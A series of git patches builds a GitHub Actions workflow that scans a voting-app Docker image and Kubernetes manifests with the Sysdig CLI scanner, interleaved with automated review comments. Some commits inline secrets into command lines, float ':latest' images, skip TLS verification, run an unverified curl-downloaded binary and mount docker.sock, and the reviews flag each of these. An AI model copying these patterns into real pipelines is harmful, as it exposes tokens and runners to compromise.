linux/amd64 \ - --user 0 \ - -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \ - -v /var/run/docker.sock:/var/run/docker.sock \ - -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl "$SYS_DIG_SECURE_URL" \ - --loglevel info \ - --skiptlsverify \ - docker://voting-app + docker run --rm --platform linux/amd64 --user 0 -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" quay.io/sysdig/sysdig-cli-scanner:1.22.4 --apiurl "$SYS_DIG_SECURE_URL" --loglevel info --skiptlsverify docker://voting-app + From 1da6bbc275ac8b4592d18676523b0e7f51150d89 Mon Sep 17 00:00:00 2001 
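Review bot: Wrapping the condition in `${{ }}` does not make `secrets.DOCKERHUB_USERNAME && secrets.DOCKERHUB_TOKEN` usable in a step-level `if:`; to my knowledge the `secrets` context is not among the contexts GitHub allows there, so the login step is either rejected at parse time or evaluated against an empty value and always skipped. The usual pattern is to expose the secret through the job `env:` and test that, `if: ${{ env.DOCKERHUB_USERNAME != '' }}` with `DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}` under the job's `env:`. The second hunk collapses the `docker run` into a single very long line, which makes `--skiptlsverify` and the inlined secret easy to overlook in review; the multi-line form with `\` continuations it replaces was the better style.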
From: keitahigaki Date: Thu, 17 Jul 2025 20:04:27 +0900 Subject: [PATCH 47/73] Add Sysdig CI workflow for Docker and IaC scan --- .github/workflows/sysdig-scan.yml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 .github/workflows/sysdig-scan.yml diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml new file mode 100644 index 0000000000..2200ba4624 --- /dev/null +++ b/.github/workflows/sysdig-scan.yml @@ -0,0 +1,42 @@ +name: Sysdig CI Scan + +on: + pull_request: + branches: + - main + push: + branches: + - main + +jobs: + scan: + name: Sysdig Scan Docker + IaC + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 + + - name: Build vote image + run: | + docker build -t vote-image ./vote + + - name: Scan Docker image with Sysdig + run: | + docker run --rm \ + -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl ${{ secrets.SYSDIG_API_URL }} \ + vote-image + + - name: Scan IaC (k8s-specifications) + run: | + docker run --rm \ + -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + -v ${{ github.workspace }}:/iac \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl ${{ secrets.SYSDIG_API_URL }} \ + --iac scan /iac/k8s-specifications \ No newline at end of file From 99c124ece92a9a50b4c5ba8ba047cb04c0dd47ba Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:34:34 +0900 Subject: [PATCH 48/73] Trigger CI re-run From af2c51564454795f3f8169393ee50d1d52bfc428 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:36:53 +0900 Subject: [PATCH 49/73] Trigger CI: re-run Sysdig scan From 0f825f3f9a797bbcee68c814735d896625518bfc Mon Sep 17 00:00:00 2001 
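Review bot: The new workflow runs `quay.io/sysdig/sysdig-cli-scanner:latest`, so the tool that decides whether a build passes, and that receives the Sysdig token, can change under the pipeline without any commit in this repository; pin it to a release and ideally a digest, `quay.io/sysdig/sysdig-cli-scanner:1.22.4@sha256:<digest>`, and pin `actions/checkout@v3` and `docker/setup-buildx-action@v2` to commit SHAs for the same reason. The token is interpolated unquoted into the shell text as `-e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}`; declare it in the step's `env:` and pass `-e SECURE_API_TOKEN` without a value so it never appears in the command line. `-v ${{ github.workspace }}:/iac` mounts the whole checkout into the scanner container when only `k8s-specifications` is scanned; mount that directory alone, read-only. With `pull_request:` enabled, fork PRs run with empty secrets and the scan steps fail closed, which is fine but worth a one-line comment by the trigger.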
From: keitahigaki Date: Thu, 17 Jul 2025 20:45:41 +0900 Subject: [PATCH 50/73] Fix YAML syntax in 'on' section for proper CI trigger --- .github/workflows/sysdig-scan.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 2200ba4624..f0a24528be 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -4,9 +4,11 @@ on: pull_request: branches: - main + - ci/sysdig-integration push: branches: - main + - ci/sysdig-integration jobs: scan: @@ -39,4 +41,4 @@ jobs: -v ${{ github.workspace }}:/iac \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --iac scan /iac/k8s-specifications \ No newline at end of file + --iac scan /iac/k8s-specifications From 4367a0be50e3756303c937a3132018077fd2a583 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 20:54:25 +0900 Subject: [PATCH 51/73] Fix: pass vote image to scanner via tar file --- .github/workflows/sysdig-scan.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index f0a24528be..b4bc08b0f0 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -25,14 +25,16 @@ jobs: - name: Build vote image run: | docker build -t vote-image ./vote + docker save vote-image -o vote-image.tar - name: Scan Docker image with Sysdig run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ + -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - vote-image + --input /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 94ae89eafd6ab238a0e7dbbda07c000dae1392a4 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Thu, 17 Jul 2025 20:57:01 +0900 Subject: [PATCH 52/73] Fix: pass vote image to scanner via tar file --- .github/workflows/sysdig-scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index b4bc08b0f0..afad251062 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -34,7 +34,7 @@ jobs: -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --input /tmp/vote-image.tar + --image-archive /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 226d1459f755a4e7c15d7d53f0b969a748c61b74 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:01:18 +0900 Subject: [PATCH 53/73] Fix: lock CLI version to 1.22.4 and use --image-archive --- .github/workflows/sysdig-scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index afad251062..e066136e39 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -32,7 +32,7 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:latest \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --image-archive /tmp/vote-image.tar @@ -41,6 +41,6 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:latest \ + quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 9da311efa3550266428f76b093fa7c041aad67b6 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Thu, 17 Jul 2025 21:04:32 +0900 Subject: [PATCH 54/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index e066136e39..038287a7ab 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -33,8 +33,8 @@ jobs: -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --image-archive /tmp/vote-image.tar + --standalone + --input-file /tmp/vote-image.tar - name: Scan IaC (k8s-specifications) run: | From 510297205a104daf9d22f578f89f12ab0d3f0e80 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:07:58 +0900 Subject: [PATCH 55/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 038287a7ab..28fbf3c3c7 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -34,7 +34,8 @@ jobs: -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ --standalone - --input-file /tmp/vote-image.tar + --input-file /tmp/vote-image.tar \ + dockersamples/examplevotingapp_vote - name: Scan IaC (k8s-specifications) run: | From 9ff0d12a878b609bfbff8202b90ddbad559e49ef Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:11:57 +0900 Subject: [PATCH 56/73] Fix: use --standalone --input-file with CLI 1.22.4 --- .github/workflows/sysdig-scan.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 28fbf3c3c7..22c3c08019 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,11 +1,11 @@ name: Sysdig CI Scan on: - pull_request: + push: branches: - main - ci/sysdig-integration - push: + pull_request: branches: - main - ci/sysdig-integration @@ -27,15 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image with Sysdig + - name: Scan Docker image from archive with Sysdig (standalone) run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ - --standalone + --standalone \ --input-file /tmp/vote-image.tar \ - dockersamples/examplevotingapp_vote + vote-image:ci - name: Scan IaC (k8s-specifications) run: | From 1e296dd1ea1cb501a565f72215daafe75632b6e5 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:20:22 +0900 Subject: [PATCH 57/73] Use Sysdig CLI Scanner v1.24.2 for stable tar support --- .github/workflows/sysdig-scan.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 22c3c08019..19d52f0a86 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,12 +27,12 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig (standalone) + - name: Scan Docker image from archive with Sysdig (v1.24.2) run: | docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ --standalone \ --input-file /tmp/vote-image.tar \ vote-image:ci 
@@ -42,6 +42,6 @@ jobs: docker run --rm \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:1.22.4 \ + quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 09c311cdb87f6969e6e0cbec4ce9ab1c90b0b2b5 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:26:29 +0900 Subject: [PATCH 58/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 19d52f0a86..b309e67c37 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,12 +27,13 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig (v1.24.2) + - name: Scan Docker image from archive with Sysdig run: | docker run --rm \ +     --platform linux/amd64 \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ + quay.io/sysdig/sysdig-cli-scanner:latest \ --standalone \ --input-file /tmp/vote-image.tar \ vote-image:ci @@ -40,8 +41,9 @@ jobs: - name: Scan IaC (k8s-specifications) run: | docker run --rm \ + --platform linux/amd64 \ -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:1.24.2 \ + quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl ${{ secrets.SYSDIG_API_URL }} \ --iac scan /iac/k8s-specifications From 8d76915f62409d71b5573c69c78993a87b24007f Mon Sep 17 00:00:00 2001 
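Review bot: The `--platform linux/amd64 \` line added in the first hunk appears to be indented with non-ASCII whitespace (it renders differently from the plain-space indent of the identical line in the second hunk); bash does not treat those bytes as word separators, so the continued command would carry a garbage first argument and `docker run` would reject it. Retype that indent with ordinary spaces. The same commit also moves both scanner invocations from the pinned `1.24.2` back to `:latest`, undoing the pin made two commits earlier; if a newer release is required, pin that release (and a digest) rather than floating, because a floating scanner tag is an unreviewed change to the tool that gates the build and holds the API token.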
From: keitahigaki Date: Thu, 17 Jul 2025 21:29:42 +0900 Subject: [PATCH 59/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 41 +++++++++++-------------------- 1 file changed, 14 insertions(+), 27 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index b309e67c37..bc660148e1 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml 
@@ -16,34 +16,21 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code - uses: actions/checkout@v3 + - name: Checkout code + uses: actions/checkout@v3 - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v2 + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v2 - - name: Build vote image - run: | - docker build -t vote-image ./vote - docker save vote-image -o vote-image.tar + - name: Build vote image + run: | + docker build -t vote-image ./vote + docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig - run: | - docker run --rm \ -     --platform linux/amd64 \ - -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ - -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --standalone \ - --input-file /tmp/vote-image.tar \ - vote-image:ci + - name: Scan Docker image with Sysdig (latest + amd64) + run: | + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci - - name: Scan IaC (k8s-specifications) - run: | - docker run --rm \ - --platform linux/amd64 \ - -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \ - -v ${{ github.workspace }}:/iac \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl ${{ secrets.SYSDIG_API_URL }} \ - --iac scan /iac/k8s-specifications + - name: Scan IaC (k8s-specifications) + run: | + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications From 0f65abeb72758c882284e9a6a37e927477ef54e3 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Thu, 17 Jul 2025 21:36:20 +0900 Subject: [PATCH 60/73] Fix: use --standalone --input-file with CLI latest --- .github/workflows/sysdig-scan.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index bc660148e1..dec3eef9a4 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,10 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image with Sysdig (latest + amd64) + - name: Download Sysdig CLI Scanner run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci + curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner + chmod +x sysdig-cli-scanner + + - name: Scan Docker image from archive with Sysdig (binary) + run: | + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} From 074d20b7b590981d7364f81ce85fadd26a1e392e Mon Sep 17 00:00:00 2001 
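Review bot: Both scan commands append `-e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}` to the `./sysdig-cli-scanner` invocation, but `-e` was a `docker run` flag; handed to the binary it is an unknown option carrying the secret as an argv string, visible in the runner's process list and likely echoed back in the scanner's usage error. Move it to the step's `env:` as `SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}` and drop the flag. The download step fetches an unpinned `latest` binary with `curl -LO` and executes it with access to that token and the checked-out tree, with no checksum or signature check; pin a release version in the URL and verify a checksum with `sha256sum -c` before `chmod +x`, using the vendor-published checksum if Sysdig provides one or a value committed to this repository otherwise.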
From: keitahigaki Date: Thu, 17 Jul 2025 21:43:41 +0900 Subject: [PATCH 61/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dec3eef9a4..fab4d341aa 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -27,15 +27,19 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Download Sysdig CLI Scanner + - name: Download Sysdig CLI Scanner (latest for amd64) run: | - curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner + curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" chmod +x sysdig-cli-scanner - - name: Scan Docker image from archive with Sysdig (binary) + - name: Scan Docker image from archive run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} + ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - name: Scan IaC (k8s-specifications) run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} + ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From cc5fa035e9a31fc4713375d52f487c87ea828625 Mon Sep 17 00:00:00 2001 
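Review bot: The download URL now resolves the scanner version at run time from `latest_version.txt`, so the binary that evaluates policy and holds the token is whatever Sysdig publishes on the day the job runs, still with no integrity check; pin the version in the workflow, e.g. `SCANNER_VERSION=1.22.4` and `curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${SCANNER_VERSION}/linux/amd64/sysdig-cli-scanner"`, then `sha256sum -c` against a committed or vendor-published checksum before `chmod +x`. Moving `SECURE_API_TOKEN` into the step `env:` is the right fix for the argv leak in the previous commit. `--apiurl ${{ secrets.SYSDIG_API_URL }}` should be quoted, `--apiurl "${{ secrets.SYSDIG_API_URL }}"`, so an empty or space-containing value does not silently shift the remaining arguments.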
From: keitahigaki Date: Thu, 17 Jul 2025 21:49:05 +0900 Subject: [PATCH 62/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index fab4d341aa..dabf240a00 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC + name: Sysdig Scan Docker + IaC (Docker version) runs-on: ubuntu-latest steps: @@ -27,19 +27,10 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Download Sysdig CLI Scanner (latest for amd64) + - name: Scan Docker image from archive with Sysdig run: | - curl -LO "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" - chmod +x sysdig-cli-scanner - - - name: Scan Docker image from archive - run: | - ./sysdig-cli-scanner --standalone --input-file vote-image.tar vote-image:ci --console-log --detailed-policies-eval --full-vulns-table - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci - name: Scan IaC (k8s-specifications) run: | - ./sysdig-cli-scanner --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan ./k8s-specifications - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications 
From 43c36ca63e0f6ce78a18e203a31b4292f6edb513 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 21:52:55 +0900 Subject: [PATCH 63/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dabf240a00..dbd48c05b8 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (Docker version) + name: Sysdig Scan Docker + IaC (loaded image method) runs-on: ubuntu-latest steps: @@ -27,10 +27,15 @@ jobs: docker build -t vote-image ./vote docker save vote-image -o vote-image.tar - - name: Scan Docker image from archive with Sysdig + - name: Load and tag image run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar quay.io/sysdig/sysdig-cli-scanner:latest --standalone --input-file /tmp/vote-image.tar vote-image:ci + docker load -i vote-image.tar + docker tag vote-image:latest vote-image:ci + + - name: Scan Docker image using tag + run: | + docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci - name: Scan IaC (k8s-specifications) run: | - docker run --rm --platform linux/amd64 -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications + docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} -v ${{ github.workspace }}:/iac quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} --iac scan /iac/k8s-specifications From ec74eaaf09afdb1d191b589d4f6ee2f0fe523687 Mon Sep 17 00:00:00 2001 
From: keitahigaki Date: Thu, 17 Jul 2025 21:57:29 +0900 Subject: [PATCH 64/73] Switch to CLI-based Sysdig scan using curl --- .github/workflows/sysdig-scan.yml | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index dbd48c05b8..217f566d07 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -12,7 +12,7 @@ on: jobs: scan: - name: Sysdig Scan Docker + IaC (loaded image method) + name: Sysdig Scan Docker + IaC (with docker.sock) runs-on: ubuntu-latest steps: @@ -25,16 +25,11 @@ jobs: - name: Build vote image run: | docker build -t vote-image ./vote - docker save vote-image -o vote-image.tar + docker tag vote-image vote-image:ci - - name: Load and tag image + - name: Scan Docker image using docker.sock run: | - docker load -i vote-image.tar - docker tag vote-image:latest vote-image:ci - - - name: Scan Docker image using tag - run: | - docker run --rm -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci + docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} quay.io/sysdig/sysdig-cli-scanner:latest --apiurl ${{ secrets.SYSDIG_API_URL }} vote-image:ci - name: Scan IaC (k8s-specifications) run: | From a61b8fccaf3743becc6a98fae5a45bf9de309afb Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Thu, 17 Jul 2025 22:10:31 +0900 Subject: [PATCH 65/73] Bonus --- .github/workflows/sysdig-scan.yml | 23 ++++++++++++++++------- 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/.github/workflows/sysdig-scan.yml b/.github/workflows/sysdig-scan.yml index 217f566d07..41b098fff9 100644 --- a/.github/workflows/sysdig-scan.yml +++ b/.github/workflows/sysdig-scan.yml @@ -1,4 +1,4 @@ -name: Sysdig CI Scan +name: Sysdig Tech Assessment CI on: push: 
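Review bot: Mounting `/var/run/docker.sock` into the scanner container is root-equivalent access to the runner: the scanner image, pulled as `:latest`, can start privileged containers, read every other image and the checkout, and reach the job's environment, so a compromised or mis-published scanner image becomes full control of the job. The image is already local, so export it and give the scanner the archive instead, `docker save vote-image:ci -o vote-image.tar` mounted with `-v "$PWD/vote-image.tar:/tmp/vote-image.tar:ro"` and passed as the scan source (the archive URI syntax, `file://` in the versions I know, should be confirmed against the release you pin), which needs no socket at all. If the socket is genuinely unavoidable, pin the scanner image by digest and mount the socket read-only, `-v /var/run/docker.sock:/var/run/docker.sock:ro`.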
